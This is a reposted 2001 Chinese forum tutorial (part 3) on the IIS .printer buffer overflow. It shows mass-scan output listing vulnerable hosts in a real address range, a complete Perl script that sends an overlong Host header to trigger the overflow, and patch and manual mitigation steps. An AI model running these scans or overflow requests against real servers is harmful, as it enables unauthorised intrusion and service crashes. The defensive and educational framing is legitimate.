IIS ISAPI Printer远程溢出攻击--3(作者:badboy)
gugu 2001-08-07 03:44:36
本帖版权归原作者,其它媒体或网站转载请与e龙西祠胡同[http://www.xici.net]或原作者联系,并注明出处。
作者: yagami 发表日期: 2001-05-24 13:20:34 返回《黑客也是侠》 快速返回
IIS ISAPI Printer远程溢出攻击--3
—————————————————————————————————
badboy 坏男孩俱乐部
http://www.badclub.org/
badboyclub.163.net
badboyclub.go.163.com
这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫
用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
将保留侵权控告的权利。
本文内所谈到的程序具有一定的危害性,如果你安全技术能力有限,请勿测试。
—————————————————————————————————--
四、一些扫描.printer漏洞的程序测试
1、eyas编写的扫描程序cgicheck
eyas我一个很好的朋友,一个很有进取精神的小伙子,现在在国内某安全公司
工作,在微软的.printer漏洞公告出来后就写了一个专门扫描该漏洞的工具
scanprinter,由于时间仓促,那软件尽管可以扫描该漏洞,但在定制扫描线程
和超时延迟方面没有写好,使用起来不是那么如意。
本来想介绍他的scanprinter,恰好在我写到这部分内容时,他给我E来他的新
作品cgicheck,这也是个测试版的DOS命令工具,从文件名我们可以看到,他打
算把这软件写成类似twwwscan那样的cgi漏洞扫描工具。
现在让我们看看使用效果。
以下是运行在AMD850 128MB 64KISDN WIN98SE 下的扫描情况。
E:\>CGICHECK 203.212.4.1 203.212.4.255 100 4
[203.212.4.18 ] has .printer mapped.
[203.212.4.19 ] has .printer mapped.
[203.212.4.227 ] has .printer mapped.
******** 100% Wait 4 seconds to exit ********
[203.212.4.237 ] has .printer mapped.
[203.212.4.238 ] has .printer mapped.
All done.
Complete.Scan 254 targets use 15.8 seconds.Speed 16.1/s
从扫描结果来看这软件确实有很大的提高,建议EYAS在以后软件的升级中让软
件可以自定义所需要扫描的内容,毕竟在针对某网段的扫描,我们不需要把所
有的CGI漏洞都扫描(要知道有些漏洞已经很少看见了,加进去只耽误扫描的效
率)。
2、pl扫描程序
我们看以下的一个用perl编写的扫描程序
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol
# This code was written after eEye brought this issue in BugTraq.
use Socket;
print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
if (not $ARGV[0]) {
print qq~
Usage: webexplt.pl <host>
~;
exit;}
$ip=$ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";
if (not @results) {
print "The Machine tested has the IPP Vulnerability!";
}
print @results;
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S);
$|=1;
print $pstr;
my @in=<S>;
select(STDOUT);
close(S);
return @in;
} else { die("Can't connect...\n"); }
}
---------------------------------------------------------------
实际上这扫描程序是一个比较简单的pl扫描,命令格式webexplt.pl ip
只能针对某一IP地址进行检测,通过发送GET /NULL.printer HTTP/1.0\n
请求,然后传送一超长字符串给目标主机,去检测是否存在.printer漏洞。
3、其他的一些扫描软件例如www.netguard.com.cn、www.xfocus.org
发布的easyscan、x-scaner都专门做了针对printer漏洞的扫描,大家可以
试试。
5、漏洞的消除
最好的办法是安全微软针对这漏洞发的补丁:
补丁下载地址:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321
在你无法获得补丁的情况下,我们也可以通过手动的方式设置你的服务器:
设置》控制面板》管理工具》INTERNET服务管理器》右键单击你的站点
如我的是badboy-f5gzewyd》属性》编辑WWW服务》主目录》配置》
应用程序配置》找到.printer》清除
但这样的操作你就丧失网络打印的功能。
呵呵,总比被人利用这漏洞入侵要好呀。
----------------------------------------------------------------
全文结束,本篇文章部分内容由翻译自网络上相关的英文公告或者文章,由于
本人水平有限,尚有不足之处,在编写的同时只考虑到初学者的认识能力,还
望众高手指正。谢谢。
流星的光芒虽短促,但天上还有什么星能比它更灿烂,辉煌?
当流星出现的时候,就算是永恒不变的星座,也夺不去它的光彩.
蝴蝶的生命是脆弱的甚至比鲜艳的花还脆弱.
可是它永远是活在春天里.它美丽,它自由,它飞翔.
它的生命虽短促却芬芳.
流星消逝的时候,光明己在望.黑暗无论多长,光明迟早总会来的.
有空去我们的站Patching Heroes
www.patching.net
计算机是一门只靠书本和自己上机就能掌握的技能
黑客也是侠
补充日期: 2001-05-24 20:34:45
很精彩。。面面俱到。
流星的光芒虽短促,但天上还有什么星能比它更灿烂,辉煌?
当流星出现的时候,就算是永恒不变的星座,也夺不去它的光彩.
蝴蝶的生命是脆弱的甚至比鲜艳的花还脆弱.
可是它永远是活在春天里.它美丽,它自由,它飞翔.
它的生命虽短促却芬芳.
流星消逝的时候,光明己在望.黑暗无论多长,光明迟早总会来的.
有空去我们的站Patching Heroes
www.patching.net
计算机是一门只靠书本和自己上机就能掌握的技能
黑客也是侠
--------------------------------------------------------------------------------
回应人: 浪哥 发表日期: 2001-05-25 21:18:43
hehe
eyas is very good
紧张的毕业设计中……
天府之空了吹
--------------------------------------------------------------------------------
返回《黑客也是侠》 快速返回